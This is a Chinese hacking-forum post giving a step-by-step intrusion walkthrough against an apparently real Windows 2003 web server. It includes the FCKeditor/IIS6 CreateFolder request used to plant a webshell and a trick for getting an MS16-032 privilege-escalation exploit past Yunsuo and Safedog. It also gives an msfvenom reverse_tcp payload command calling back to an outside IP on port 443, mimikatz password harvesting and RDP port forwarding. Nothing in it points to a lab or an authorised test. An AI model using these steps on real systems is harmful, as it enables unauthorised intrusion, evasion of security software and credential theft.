找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2174|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ z6 F& a' z9 x2 [' M* v

/ W2 K% z0 s, Q! Y, c' O! C8 h' m: P- R" e) H8 Q# z! N8 e+ @/ D" v$ p* s5 K" o) E/ O l3 r" }" w- Y- P: Q1 ~8 c: p6 P6 A" v/ _) d9 _% O- _% S) d! @
5 O% j& m9 g3 i& B: f. d' T

6 \, ?& u% ^7 {& Y$ v
7 ] A5 B1 B% u) ]( D1 |1 E1 m
一、 利用getwebshell
4 ^* \+ p4 O# \8 t
/ k. l3 X0 g8 K4 t8 G+ D
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
+ k- Z- k0 ]: ~# D) U
6 P( B3 m! m' I4 e8 A1 n& H222.png
) E" c! k& s$ F. I% N
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
8 T! r2 E$ p6 B3 f$ ~3 k+ V/ t 333.png
~9 f: C" I- ?7 h+ G( W9 K# b# Y7 d
下面我们构造一个asp目录,如: * ]; u+ O2 q9 y/ S% b: Z; H

! K& r' S. a+ S9 ` R3 f

( Y i) z6 w. V$ m8 g( Z http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 1 ~8 Y Z0 c/ n# s8 k

2 o' U* Y0 b' Q

8 q' X8 N" T9 c# x# X& {$ |+ O 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
8 |" L/ Q3 u1 z4 [$ c
& b2 q; e$ e% a' w
一、 绕过安全狗云锁提权并且加账号
& Z& I- i' h+ }1 N7 H444.png
: N a1 o% f: [) y0 K8 K/ \5 ~
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
+ T z' z, e5 Z
. }5 {6 _# E0 v0 m# A
如图:
' e, a% k; }5 R7 A555.png
, I. R3 j% R Z |- s
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
6 b% K: p- M" n! {1 p
4 B! O% [1 }8 \; ]; j0 s
一、 利用metasploit
/ [ [2 R- t1 U9 w/ v' ~; B, o; L
' e) q7 t8 h% a
首先用pentestbox生成一个64位的payload如下命令
+ M3 b' Z {7 A6 n: n5 M
. `2 E+ S7 z8 F% u. BmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
( C" A4 z; j' U
0 O1 t0 q1 R+ {. a4 f. E
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
" w! y# \4 w; F, y+ h11.png
8 P6 g7 F" J. r5 o5 W9 z2 ^
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
$ s# z0 S" {! }1 E; v% l( i3 D7 [6 A( ]13.png
2 k* h! N0 r1 ^: g5 _% g/ l5 P, X1 M
下面我们来做一个监听如下命令:
5 N! i8 R+ ^, i, e
" f6 Q. ?& @! r8 l: Q/ p! c8 ~ Qportfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
, r5 k* n! v j; Y/ J' S7 n) f18.png
$ n: [0 x2 F% P6 ^3 s

: f) x. }" Y5 \2 j
& t4 \+ D! G3 Q

4 m& ?1 W+ }2 h" v/ i* N4 X) k

* y% V$ Q- z) z" I8 u6 c' y
; d( T' K3 h6 D$ }+ W Y! _
) R9 ~: m" Y8 h7 A7 i5 E$ C
" B9 Q1 ` l7 ^) E

0 E8 I' N7 y: B6 {# o9 S* c! ]
3 v4 v, V# _6 v: l/ i7 R0 y$ x) ] 5 G- V1 l- V% l$ _; `4 j

- }+ J* g5 P1 n( o# C2 J, L
8 g+ Y2 C. M3 D5 ?. [9 L3 Q

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表